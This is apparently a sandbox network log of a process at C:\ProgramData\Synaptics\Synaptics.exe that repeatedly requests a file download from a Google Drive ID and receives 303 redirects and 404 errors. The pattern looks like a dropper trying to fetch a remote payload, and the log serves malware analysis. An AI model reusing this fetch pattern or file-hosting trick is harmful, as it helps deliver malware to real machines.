                                                                                                                                                        Content-Type: text/html; charset=utf-8
                                                                                                                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                        Pragma: no-cache
                                                                                                                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                        Date: Mon, 30 Dec 2024 10:48:42 GMT
                                                                                                                                                        Content-Security-Policy: script-src 'report-sample' 'nonce-lsN1IenBPG81XtBuWg7zJQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                        Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                        Content-Length: 1652
                                                                                                                                                        Server: UploadServer
                                                                                                                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                        Content-Security-Policy: sandbox allow-scripts
                                                                                                                                                        Connection: close
2024-12-30 10:48:42 UTC  147  IN  Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (No
2024-12-30 10:48:42 UTC  1390  IN  Data Ascii: t Found)!!1</title><style nonce="MzmVsB1_2Q3KgKMVgcriNQ">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding
2024-12-30 10:48:42 UTC  115  IN  Data Ascii: >Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>


Session ID  Source IP  Source Port  Destination IP  Destination Port  PID  Process
117  192.168.2.7  50151  142.250.185.78  443  7744  C:\ProgramData\Synaptics\Synaptics.exe
Timestamp  Bytes transferred  Direction  Data
2024-12-30 10:48:42 UTC  345  OUT  GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                        User-Agent: Synaptics.exe
                                                                                                                                                        Host: docs.google.com
                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                        Cookie: NID=520=TGWBJBLIp_8rmWNOnD08JMSTh549RjrLgUnKhcscmaOG2M07zBtkMmktLGcLvH_w4tDPvw448qHMmjCN503LAFY0Qw5jkncdTQcISct4dpI8x5zsG-zBLdB7M2pyAQVH9jMHkK1Qc57vmy-q8atE6gUZdBGq4RnbS2ebm4nFE5ux3MecvXLyXcOy
2024-12-30 10:48:43 UTC  1314  IN  HTTP/1.1 303 See Other
                                                                                                                                                        Content-Type: application/binary
                                                                                                                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                        Pragma: no-cache
                                                                                                                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                        Date: Mon, 30 Dec 2024 10:48:43 GMT
                                                                                                                                                        Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                                                        Strict-Transport-Security: max-age=31536000
                                                                                                                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                        Content-Security-Policy: script-src 'report-sample' 'nonce-41-tJwOe98Pqf3bX2r5moQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                        Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                        Server: ESF
                                                                                                                                                        Content-Length: 0
                                                                                                                                                        X-XSS-Protection: 0
                                                                                                                                                        X-Frame-Options: SAMEORIGIN
                                                                                                                                                        X-Content-Type-Options: nosniff
                                                                                                                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                        Connection: close


Session ID  Source IP    Source Port  Destination IP   Destination Port  PID   Process
118         192.168.2.7  50152        142.250.186.161  443               7744  C:\ProgramData\Synaptics\Synaptics.exe
Timestamp                Bytes transferred  Direction  Data
2024-12-30 10:48:42 UTC  388                OUT        GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                        User-Agent: Synaptics.exe
                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                        Host: drive.usercontent.google.com
                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                        Cookie: NID=520=TGWBJBLIp_8rmWNOnD08JMSTh549RjrLgUnKhcscmaOG2M07zBtkMmktLGcLvH_w4tDPvw448qHMmjCN503LAFY0Qw5jkncdTQcISct4dpI8x5zsG-zBLdB7M2pyAQVH9jMHkK1Qc57vmy-q8atE6gUZdBGq4RnbS2ebm4nFE5ux3MecvXLyXcOy
2024-12-30 10:48:43 UTC  1250               IN         HTTP/1.1 404 Not Found
                                                                                                                                                        X-GUploader-UploadID: AFiumC4xGQxMnFAbP_YUDNtRyOkD9FEuCQzll9IT4QbfLROe73IBhdlCY8botG7vx1-rFkzXLTcEkBg
                                                                                                                                                        Content-Type: text/html; charset=utf-8
                                                                                                                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                        Pragma: no-cache
                                                                                                                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                        Date: Mon, 30 Dec 2024 10:48:43 GMT
                                                                                                                                                        Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                        Content-Security-Policy: script-src 'report-sample' 'nonce-Dk3WDjvaYlQ1PqTE0gGqSA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                        Content-Length: 1652
                                                                                                                                                        Server: UploadServer
                                                                                                                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                        Content-Security-Policy: sandbox allow-scripts
                                                                                                                                                        Connection: close
2024-12-30 10:48:43 UTC  140                IN         Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error
2024-12-30 10:48:43 UTC  1390               IN         Data Ascii: 404 (Not Found)!!1</title><style nonce="jRtOFuYv6IQB7bWHZwtYqw">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;
2024-12-30 10:48:43 UTC  122                IN         Data Ascii: b> <ins>Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>


Session ID  Source IP    Source Port  Destination IP   Destination Port  PID   Process
119         192.168.2.7  50153        142.250.185.78   443               7744  C:\ProgramData\Synaptics\Synaptics.exe
Timestamp                Bytes transferred  Direction  Data
2024-12-30 10:48:42 UTC  345                OUT        GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                        User-Agent: Synaptics.exe
                                                                                                                                                        Host: docs.google.com
                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                        Cookie: NID=520=TGWBJBLIp_8rmWNOnD08JMSTh549RjrLgUnKhcscmaOG2M07zBtkMmktLGcLvH_w4tDPvw448qHMmjCN503LAFY0Qw5jkncdTQcISct4dpI8x5zsG-zBLdB7M2pyAQVH9jMHkK1Qc57vmy-q8atE6gUZdBGq4RnbS2ebm4nFE5ux3MecvXLyXcOy
2024-12-30 10:48:43 UTC  1314               IN         HTTP/1.1 303 See Other
                                                                                                                                                        Content-Type: application/binary
                                                                                                                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                        Pragma: no-cache
                                                                                                                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                        Date: Mon, 30 Dec 2024 10:48:43 GMT
                                                                                                                                                        Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                                                        Strict-Transport-Security: max-age=31536000
                                                                                                                                                        Content-Security-Policy: script-src 'report-sample' 'nonce-idipWuU5yGjk2zuMgLvgkQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                        Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                        Server: ESF
                                                                                                                                                        Content-Length: 0
                                                                                                                                                        X-XSS-Protection: 0
                                                                                                                                                        X-Frame-Options: SAMEORIGIN
                                                                                                                                                        X-Content-Type-Options: nosniff
                                                                                                                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                        Connection: close


Session ID  Source IP    Source Port  Destination IP   Destination Port  PID   Process
120         192.168.2.7  50154        142.250.186.161  443               7744  C:\ProgramData\Synaptics\Synaptics.exe
Timestamp                Bytes transferred  Direction  Data
2024-12-30 10:48:42 UTC  388                OUT        GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                        User-Agent: Synaptics.exe
                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                        Host: drive.usercontent.google.com
                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                        Cookie: NID=520=TGWBJBLIp_8rmWNOnD08JMSTh549RjrLgUnKhcscmaOG2M07zBtkMmktLGcLvH_w4tDPvw448qHMmjCN503LAFY0Qw5jkncdTQcISct4dpI8x5zsG-zBLdB7M2pyAQVH9jMHkK1Qc57vmy-q8atE6gUZdBGq4RnbS2ebm4nFE5ux3MecvXLyXcOy
2024-12-30 10:48:43 UTC  1243               IN         HTTP/1.1 404 Not Found
                                                                                                                                                        X-GUploader-UploadID: AFiumC4b64374eGQxD2SfvLPd_qNN54rj6FJysXUKR7Ntqv9wppbpiZuExQmpZf88ardkla3
                                                                                                                                                        Content-Type: text/html; charset=utf-8
                                                                                                                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                        Pragma: no-cache
                                                                                                                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                        Date: Mon, 30 Dec 2024 10:48:43 GMT
                                                                                                                                                        Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                        Content-Security-Policy: script-src 'report-sample' 'nonce-laTNPNx4Ec8EmOBqWuoUHw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                        Content-Length: 1652
                                                                                                                                                        Server: UploadServer
                                                                                                                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                        Content-Security-Policy: sandbox allow-scripts
                                                                                                                                                        Connection: close
2024-12-30 10:48:43 UTC  147                IN         Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (No
2024-12-30 10:48:43 UTC  1390               IN         Data Ascii: t Found)!!1</title><style nonce="RfpSzQsvXxaTOl9Xa5fk4w">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding
2024-12-30 10:48:43 UTC  115                IN         Data Ascii: >Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>


Session ID  Source IP    Source Port  Destination IP   Destination Port  PID   Process
121         192.168.2.7  50155        142.250.185.78   443               7744  C:\ProgramData\Synaptics\Synaptics.exe
Timestamp                Bytes transferred  Direction  Data
2024-12-30 10:48:43 UTC  345                OUT        GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                        User-Agent: Synaptics.exe
                                                                                                                                                        Host: docs.google.com
                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                        Cookie: NID=520=TGWBJBLIp_8rmWNOnD08JMSTh549RjrLgUnKhcscmaOG2M07zBtkMmktLGcLvH_w4tDPvw448qHMmjCN503LAFY0Qw5jkncdTQcISct4dpI8x5zsG-zBLdB7M2pyAQVH9jMHkK1Qc57vmy-q8atE6gUZdBGq4RnbS2ebm4nFE5ux3MecvXLyXcOy
2024-12-30 10:48:44 UTC  1314               IN         HTTP/1.1 303 See Other
                                                                                                                                                        Content-Type: application/binary
                                                                                                                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                        Pragma: no-cache
                                                                                                                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                        Date: Mon, 30 Dec 2024 10:48:44 GMT
                                                                                                                                                        Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                                                        Strict-Transport-Security: max-age=31536000
                                                                                                                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                        Content-Security-Policy: script-src 'report-sample' 'nonce-tThw2ME6UD3Rw6L0fdOXrA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                        Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                        Server: ESF
                                                                                                                                                        Content-Length: 0
                                                                                                                                                        X-XSS-Protection: 0
                                                                                                                                                        X-Frame-Options: SAMEORIGIN
                                                                                                                                                        X-Content-Type-Options: nosniff
                                                                                                                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                        Connection: close


                                                                                                                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                                        122 | 192.168.2.7 | 50161 | 142.250.185.78 | 443 | 7744 | C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                        Timestamp | Bytes transferred | Direction | Data
                                                                                                                                                        2024-12-30 10:48:44 UTC | 345 | OUT | GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                        User-Agent: Synaptics.exe
                                                                                                                                                        Host: docs.google.com
                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                        Cookie: NID=520=TGWBJBLIp_8rmWNOnD08JMSTh549RjrLgUnKhcscmaOG2M07zBtkMmktLGcLvH_w4tDPvw448qHMmjCN503LAFY0Qw5jkncdTQcISct4dpI8x5zsG-zBLdB7M2pyAQVH9jMHkK1Qc57vmy-q8atE6gUZdBGq4RnbS2ebm4nFE5ux3MecvXLyXcOy
                                                                                                                                                        2024-12-30 10:48:44 UTC | 1314 | IN | HTTP/1.1 303 See Other
                                                                                                                                                        Content-Type: application/binary
                                                                                                                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                        Pragma: no-cache
                                                                                                                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                        Date: Mon, 30 Dec 2024 10:48:44 GMT
                                                                                                                                                        Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                                                        Strict-Transport-Security: max-age=31536000
                                                                                                                                                        Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                        Content-Security-Policy: script-src 'report-sample' 'nonce--P4GJN00ak5uBxg75MrFxw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                        Server: ESF
                                                                                                                                                        Content-Length: 0
                                                                                                                                                        X-XSS-Protection: 0
                                                                                                                                                        X-Frame-Options: SAMEORIGIN
                                                                                                                                                        X-Content-Type-Options: nosniff
                                                                                                                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                        Connection: close


                                                                                                                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                                        123 | 192.168.2.7 | 50163 | 142.250.185.78 | 443 | 7744 | C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                        Timestamp | Bytes transferred | Direction | Data
                                                                                                                                                        2024-12-30 10:48:44 UTC | 345 | OUT | GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                        User-Agent: Synaptics.exe
                                                                                                                                                        Host: docs.google.com
                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                        Cookie: NID=520=TGWBJBLIp_8rmWNOnD08JMSTh549RjrLgUnKhcscmaOG2M07zBtkMmktLGcLvH_w4tDPvw448qHMmjCN503LAFY0Qw5jkncdTQcISct4dpI8x5zsG-zBLdB7M2pyAQVH9jMHkK1Qc57vmy-q8atE6gUZdBGq4RnbS2ebm4nFE5ux3MecvXLyXcOy
                                                                                                                                                        2024-12-30 10:48:45 UTC | 1314 | IN | HTTP/1.1 303 See Other
                                                                                                                                                        Content-Type: application/binary
                                                                                                                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                        Pragma: no-cache
                                                                                                                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                        Date: Mon, 30 Dec 2024 10:48:44 GMT
                                                                                                                                                        Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                                                        Strict-Transport-Security: max-age=31536000
                                                                                                                                                        Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                        Content-Security-Policy: script-src 'report-sample' 'nonce-D9wiKbpPYTt6wI7UD6I90Q' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                        Server: ESF
                                                                                                                                                        Content-Length: 0
                                                                                                                                                        X-XSS-Protection: 0
                                                                                                                                                        X-Frame-Options: SAMEORIGIN
                                                                                                                                                        X-Content-Type-Options: nosniff
                                                                                                                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                        Connection: close


                                                                                                                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                                        124 | 192.168.2.7 | 50162 | 142.250.186.161 | 443 | 7744 | C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                        Timestamp | Bytes transferred | Direction | Data
                                                                                                                                                        2024-12-30 10:48:44 UTC | 388 | OUT | GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                        User-Agent: Synaptics.exe
                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                        Host: drive.usercontent.google.com
                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                        Cookie: NID=520=TGWBJBLIp_8rmWNOnD08JMSTh549RjrLgUnKhcscmaOG2M07zBtkMmktLGcLvH_w4tDPvw448qHMmjCN503LAFY0Qw5jkncdTQcISct4dpI8x5zsG-zBLdB7M2pyAQVH9jMHkK1Qc57vmy-q8atE6gUZdBGq4RnbS2ebm4nFE5ux3MecvXLyXcOy
                                                                                                                                                        2024-12-30 10:48:45 UTC | 1243 | IN | HTTP/1.1 404 Not Found
                                                                                                                                                        X-GUploader-UploadID: AFiumC569B1XNmoQykBBpUly-xZbI5bAdpsvBpv6PgUWT2ycaF0Q5ES2QxAaK7gzRT0uy8LC
                                                                                                                                                        Content-Type: text/html; charset=utf-8
                                                                                                                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                        Pragma: no-cache
                                                                                                                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                        Date: Mon, 30 Dec 2024 10:48:45 GMT
                                                                                                                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                        Content-Security-Policy: script-src 'report-sample' 'nonce-2JlnM_k27-4eIZlmvEu4jQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                        Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                        Content-Length: 1652
                                                                                                                                                        Server: UploadServer
                                                                                                                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                        Content-Security-Policy: sandbox allow-scripts
                                                                                                                                                        Connection: close
                                                                                                                                                        2024-12-30 10:48:45 UTC | 147 | IN | Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (No
                                                                                                                                                        2024-12-30 10:48:45 UTC | 1390 | IN | Data Ascii: t Found)!!1</title><style nonce="twJkxO6genx1hsgmdt3BAA">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding
                                                                                                                                                        2024-12-30 10:48:45 UTC | 115 | IN | Data Ascii: >That’s an error.</ins><p>The requested URL was not found on this server. <ins>That’s all we know.</ins></main>


                                                                                                                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                                        125 | 192.168.2.7 | 50166 | 142.250.185.78 | 443 | 7744 | C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                        Timestamp | Bytes transferred | Direction | Data
                                                                                                                                                        2024-12-30 10:48:45 UTC | 345 | OUT | GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                        User-Agent: Synaptics.exe
                                                                                                                                                        Host: docs.google.com
                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                        Cookie: NID=520=TGWBJBLIp_8rmWNOnD08JMSTh549RjrLgUnKhcscmaOG2M07zBtkMmktLGcLvH_w4tDPvw448qHMmjCN503LAFY0Qw5jkncdTQcISct4dpI8x5zsG-zBLdB7M2pyAQVH9jMHkK1Qc57vmy-q8atE6gUZdBGq4RnbS2ebm4nFE5ux3MecvXLyXcOy
                                                                                                                                                        2024-12-30 10:48:45 UTC | 1314 | IN | HTTP/1.1 303 See Other
                                                                                                                                                        Content-Type: application/binary
                                                                                                                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                        Pragma: no-cache
                                                                                                                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                        Date: Mon, 30 Dec 2024 10:48:45 GMT
                                                                                                                                                        Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                                                        Strict-Transport-Security: max-age=31536000
                                                                                                                                                        Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                        Content-Security-Policy: script-src 'report-sample' 'nonce-qdsWXjTXp7K8A7dcvdqvHw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                        Server: ESF
                                                                                                                                                        Content-Length: 0
                                                                                                                                                        X-XSS-Protection: 0
                                                                                                                                                        X-Frame-Options: SAMEORIGIN
                                                                                                                                                        X-Content-Type-Options: nosniff
                                                                                                                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                        Connection: close


                                                                                                                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                                        126 | 192.168.2.7 | 50167 | 142.250.186.161 | 443 | 7744 | C:\ProgramData\Synaptics\Synaptics.exe
